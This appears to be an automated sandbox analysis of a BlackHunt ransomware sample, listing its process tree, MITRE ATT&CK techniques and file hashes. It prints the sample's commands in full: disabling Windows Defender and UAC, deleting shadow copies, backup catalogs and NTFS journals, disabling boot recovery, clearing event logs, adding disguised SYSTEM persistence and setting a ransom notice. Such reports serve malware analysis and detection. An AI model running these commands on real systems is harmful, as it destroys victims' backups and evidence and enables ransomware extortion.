description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe"C:\Users\Admin\AppData\Local\Temp\995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2508 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:2952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2592
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:860
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2880
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2892
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3012
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2232
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2960
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:684
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Modifies Windows Defender Real-time Protection settings
- Interacts with shadow copies
PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:108
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1156
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1592
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1732
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3020
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
- Adds Run key to start application
PID:2800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1420
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1204 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2520
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe" /F2⤵PID:1780
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe" /F3⤵
- Creates scheduled task(s)
PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1580
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2124
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:284
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2168
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1372
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2600
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2772
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3964
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3888
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3692
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2856
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3424
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1248
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3784
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2576
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3500
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1988
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:3452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3664
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵
- Modifies registry class
PID:2952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3720
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1560
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3448
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
- Enumerates connected drives
PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3620
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3960
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3676
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe"2⤵
- Deletes itself
PID:2036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2496
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3896
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1204
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:4072
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:3032
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵PID:2800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2184
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:2252
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:2948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:1516
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1852
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:1736
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:2012
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:1204
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2700
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1772
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3780
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-302601766-64144937-16549697363026296856989583041165447674-12607357011991867910"1⤵PID:1420
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-769555618853496631-1389695872808755989-665029511-37274844-46007295545116660"1⤵PID:2640
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2540
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:3868
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "11780405271033605375-834087797-10917833694162805852044263476-886865071-1993644692"1⤵
- Suspicious use of WriteProcessMemory
PID:2724
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1975185347-159870730922786888262422689-856379011902843791740115858-1710792726"1⤵PID:2960
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-203692851454237747403511449169746958114982582261495476599-366899898-282639711"1⤵
- Suspicious use of WriteProcessMemory
PID:2572
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:1648
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD566312ac7b616c2abf37db8aa43e8f3f9
SHA1a59902a40bd97944a62df0dd28376595384c2881
SHA256fb1f6bf965c79ad3ad79778a57f4fce05ab2aac0cb0caed6e90968a98c8b127b
SHA5122207e8bb1dab71a026084536bf30d1e16cb8ec2777891ab0adcf463408753390472f0499b926eba881fa45a87e6de4173b398f504db46a00ab1508d6373d1012
-
Filesize
12KB
MD534100b23ca682a5b2ad529d8d82d069d
SHA1b303b56216e30bcd997ee643b541405542e3ca2f
SHA2560c34a5b0f258be46cf73ebacb0c93a140f0d04098209d5b738a5304ce867ac6e
SHA51236dd847f0f2efdc613d6529f232d1695ff497855e25d24b7f9e427a2a205103e22bed5d5762071e3bdc505d900148a04a8ebf092abaf0ff419898d8ce4b5856f
-
Filesize
684B
MD5a4ff25df720d6fcac73583088ae8f097
SHA188c633ab80c5b8c325bf98490a309e18607cb5b1
SHA256b67220af6d13cd72bbc1f75b2f02c81d09fea5881dcab62dbd23fdab93b3639d
SHA512aa72995e260b5ae5d0e6c2eda77da5cff605145f247a36b296579ed47b7d644f9d751ef57f7ae3c322fb7175fa1febd7f2726ec35fdaf4bfee0f4f404571abfe